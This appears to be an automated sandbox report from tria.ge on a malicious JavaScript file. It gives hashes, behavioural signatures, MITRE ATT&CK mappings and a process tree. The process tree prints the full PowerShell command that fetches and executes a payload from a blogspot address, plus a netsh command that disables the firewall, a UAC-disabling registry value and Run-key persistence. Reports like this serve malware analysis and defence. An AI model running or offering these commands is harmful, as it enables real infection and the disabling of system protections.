Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
93s -
max time network
135s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
20/12/2023, 20:57
Static task
static1
Behavioral task
behavioral1
Sample
14101_4701799_4544166_19-DEC-2023.js
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
14101_4701799_4544166_19-DEC-2023.js
Resource
win10v2004-20231215-en
General
-
Target
14101_4701799_4544166_19-DEC-2023.js
-
Size
75KB
-
MD5
5adec410f9939264652439b0b577f816
-
SHA1
bf81a4fe9d6ef714b2a159307f2d6d6dec8392bb
-
SHA256
e442eeceddf82c688a044f671abd042075676a058075038a00e2555f418b8888
-
SHA512
818f9682bb81cee94228c42078069f4a9e327bdfdd4b7d5b24698636b72f23fee9fb95e227e402380f4772533666da9517580507e6a5cc40da902e49c4b335b2
-
SSDEEP
96:9pVIq5KviVtbEx5R17Lub5MHaPw2lSGS6oDFyMP:9sviW7Lub5MHaPw2lSGS6oDFyMP
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 7 1836 powershell.exe 14 1836 powershell.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
pid Process 880 netsh.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation wscript.exe -
Registers COM server for autorun 1 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OpenTableupda = "schtasks /run /tn OpenTableupda" powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 48 api.ipify.org 49 api.ipify.org 50 ip-api.com -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1836 set thread context of 1232 1836 powershell.exe 99 PID 1836 set thread context of 3224 1836 powershell.exe 101 PID 1836 set thread context of 232 1836 powershell.exe 104 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp dw20.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} powershell.exe Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" powershell.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 1836 powershell.exe 1836 powershell.exe 1836 powershell.exe 1836 powershell.exe 1836 powershell.exe 1836 powershell.exe 1836 powershell.exe 1232 RegSvcs.exe 1232 RegSvcs.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1836 powershell.exe Token: SeDebugPrivilege 1232 RegSvcs.exe Token: SeRestorePrivilege 3520 dw20.exe Token: SeBackupPrivilege 3520 dw20.exe Token: SeBackupPrivilege 3520 dw20.exe Token: SeBackupPrivilege 3520 dw20.exe Token: SeBackupPrivilege 3520 dw20.exe Token: SeBackupPrivilege 856 dw20.exe Token: SeBackupPrivilege 856 dw20.exe Token: SeIncreaseQuotaPrivilege 1836 powershell.exe Token: SeSecurityPrivilege 1836 powershell.exe Token: SeTakeOwnershipPrivilege 1836 powershell.exe Token: SeLoadDriverPrivilege 1836 powershell.exe Token: SeSystemProfilePrivilege 1836 powershell.exe Token: SeSystemtimePrivilege 1836 powershell.exe Token: SeProfSingleProcessPrivilege 1836 powershell.exe Token: SeIncBasePriorityPrivilege 1836 powershell.exe Token: SeCreatePagefilePrivilege 1836 powershell.exe Token: SeBackupPrivilege 1836 powershell.exe Token: SeRestorePrivilege 1836 powershell.exe Token: SeShutdownPrivilege 1836 powershell.exe Token: SeDebugPrivilege 1836 powershell.exe Token: SeSystemEnvironmentPrivilege 1836 powershell.exe Token: SeRemoteShutdownPrivilege 1836 powershell.exe Token: SeUndockPrivilege 1836 powershell.exe Token: SeManageVolumePrivilege 1836 powershell.exe Token: 33 1836 powershell.exe Token: 34 1836 powershell.exe Token: 35 1836 powershell.exe Token: 36 1836 powershell.exe Token: SeIncreaseQuotaPrivilege 1836 powershell.exe Token: SeSecurityPrivilege 1836 powershell.exe Token: SeTakeOwnershipPrivilege 1836 powershell.exe Token: SeLoadDriverPrivilege 1836 powershell.exe Token: SeSystemProfilePrivilege 1836 powershell.exe Token: SeSystemtimePrivilege 1836 powershell.exe Token: SeProfSingleProcessPrivilege 1836 powershell.exe Token: SeIncBasePriorityPrivilege 1836 powershell.exe Token: SeCreatePagefilePrivilege 1836 powershell.exe Token: SeBackupPrivilege 1836 powershell.exe Token: SeRestorePrivilege 1836 powershell.exe Token: SeShutdownPrivilege 1836 powershell.exe Token: SeDebugPrivilege 1836 powershell.exe Token: SeSystemEnvironmentPrivilege 1836 powershell.exe Token: SeRemoteShutdownPrivilege 1836 powershell.exe Token: SeUndockPrivilege 1836 powershell.exe Token: SeManageVolumePrivilege 1836 powershell.exe Token: 33 1836 powershell.exe Token: 34 1836 powershell.exe Token: 35 1836 powershell.exe Token: 36 1836 powershell.exe Token: SeIncreaseQuotaPrivilege 1836 powershell.exe Token: SeSecurityPrivilege 1836 powershell.exe Token: SeTakeOwnershipPrivilege 1836 powershell.exe Token: SeLoadDriverPrivilege 1836 powershell.exe Token: SeSystemProfilePrivilege 1836 powershell.exe Token: SeSystemtimePrivilege 1836 powershell.exe Token: SeProfSingleProcessPrivilege 1836 powershell.exe Token: SeIncBasePriorityPrivilege 1836 powershell.exe Token: SeCreatePagefilePrivilege 1836 powershell.exe Token: SeBackupPrivilege 1836 powershell.exe Token: SeRestorePrivilege 1836 powershell.exe Token: SeShutdownPrivilege 1836 powershell.exe Token: SeDebugPrivilege 1836 powershell.exe -
Suspicious use of WriteProcessMemory 38 IoCs
description pid Process procid_target PID 1944 wrote to memory of 1836 1944 wscript.exe 87 PID 1944 wrote to memory of 1836 1944 wscript.exe 87 PID 1836 wrote to memory of 3492 1836 powershell.exe 92 PID 1836 wrote to memory of 3492 1836 powershell.exe 92 PID 3492 wrote to memory of 2996 3492 csc.exe 93 PID 3492 wrote to memory of 2996 3492 csc.exe 93 PID 1836 wrote to memory of 880 1836 powershell.exe 94 PID 1836 wrote to memory of 880 1836 powershell.exe 94 PID 1836 wrote to memory of 1232 1836 powershell.exe 99 PID 1836 wrote to memory of 1232 1836 powershell.exe 99 PID 1836 wrote to memory of 1232 1836 powershell.exe 99 PID 1836 wrote to memory of 1232 1836 powershell.exe 99 PID 1836 wrote to memory of 1232 1836 powershell.exe 99 PID 1836 wrote to memory of 1232 1836 powershell.exe 99 PID 1836 wrote to memory of 1232 1836 powershell.exe 99 PID 1836 wrote to memory of 1232 1836 powershell.exe 99 PID 1836 wrote to memory of 3224 1836 powershell.exe 101 PID 1836 wrote to memory of 3224 1836 powershell.exe 101 PID 1836 wrote to memory of 3224 1836 powershell.exe 101 PID 1836 wrote to memory of 3224 1836 powershell.exe 101 PID 1836 wrote to memory of 3224 1836 powershell.exe 101 PID 1836 wrote to memory of 3224 1836 powershell.exe 101 PID 1836 wrote to memory of 3224 1836 powershell.exe 101 PID 1836 wrote to memory of 3224 1836 powershell.exe 101 PID 3224 wrote to memory of 3520 3224 RegSvcs.exe 102 PID 3224 wrote to memory of 3520 3224 RegSvcs.exe 102 PID 3224 wrote to memory of 3520 3224 RegSvcs.exe 102 PID 1836 wrote to memory of 232 1836 powershell.exe 104 PID 1836 wrote to memory of 232 1836 powershell.exe 104 PID 1836 wrote to memory of 232 1836 powershell.exe 104 PID 1836 wrote to memory of 232 1836 powershell.exe 104 PID 1836 wrote to memory of 232 1836 powershell.exe 104 PID 1836 wrote to memory of 232 1836 powershell.exe 104 PID 1836 wrote to memory of 232 1836 powershell.exe 104 PID 1836 wrote to memory of 232 1836 powershell.exe 104 PID 232 wrote to memory of 856 232 Msbuild.exe 105 PID 232 wrote to memory of 856 232 Msbuild.exe 105 PID 232 wrote to memory of 856 232 Msbuild.exe 105
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\14101_4701799_4544166_19-DEC-2023.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm hopelnew24.blogspot.com//////////////////////atom.xml) | . ('i*x').replace('*','e');Start-Sleep -Seconds 52⤵
- UAC bypass
- Blocklisted process makes network request
- Registers COM server for autorun
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1836 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2gwvu35g\2gwvu35g.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:3492 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA018.tmp" "c:\Users\Admin\AppData\Local\Temp\2gwvu35g\CSCD704969FE76F42039CB95BAE6688D7.TMP"4⤵PID:2996
-
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off -ErrorAction SilentlyContinue3⤵
- Modifies Windows Firewall
PID:880
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1232
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:3224 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7844⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:3520
-
-
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:232 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7804⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:856
-
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD575185c1407da679a40ac34d178658f4d
SHA103a4674c5317dc150e7df469689749ca07936a2d
SHA256d23f701cf5293ee47a09f489ba5bbd76885ac80f56d0926fed26ba6fed8b0323
SHA512804888666c448fb63403d4ffcd306b019d79f6aacee6e52aa75dffefc0776daabd529c8ff2eec5fbb305f6868ca4c41130a3bfeb1008ddf38af7747e7e8dd8cd
-
Filesize
1KB
MD522fc345ddbcaefe887980f2be5bc0996
SHA172bdf27378e8d5a868f2a09239729eff973944b6
SHA2562ae2113167f78c8c4577c8c20e01e463fbf7f9c9ae38d05d6282013dcd0d4764
SHA512734a212906117e8947fb769bf13efbc0372da9265b457cf9e9b6fb8c276d99ab82c46506eb9310d4bf5cf5dee737f0a8056a885d42601d1ae3de15ab5e83f4f6
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
870B
MD5e06ebf853695db38aaac82c9af297ae4
SHA1ef98bacec5ac2ae3bf24aac8ed56935a25c1f064
SHA25679c1099bad1dccb1d151887071b8e8b5d679de343903895fa28e45b791cae344
SHA512036449d932066d506a6bd7c08df311bf1ed5e7b3595004941fe1c39a8e9f9b0d08d43b33a180d4851f88d49c98a17b05cf5235858ada611306fc602cfd582759
-
Filesize
369B
MD5d8b264f37c1033b69427a54fbdf3b077
SHA1ce555fa039a66eb7bdf197f45466d3c4bfaa011c
SHA256a7c7b669d4c3d3a448c8518ad7b9c26aea9b68f7d4d7af40682a44a434936d8d
SHA5129c5341c9a2a72a4b0a835921c77301d8e6f073c28a278637b09eb1217788f7d2a4063250bc68586ba4f4d012fc1fb1c93b037fb9e273eba8cb33c5cbf71afa7a
-
Filesize
652B
MD5564a25cf678a8a03f86b2e39e4f1fe0a
SHA1a8fc688224be3d425bc4a927cf9d2ac1beee8572
SHA256efb4bc282b137289f2a251b133bbe661326ea9c40d78246321306ded24b5a547
SHA5128bfe729a1f954eb226aa1498084e78aae128bd69db26257615c64f201e30784c0378549f9bcd8d0bcdd3a7f68d46caf02dfd90e5042ab6f7296d90b674c5c76f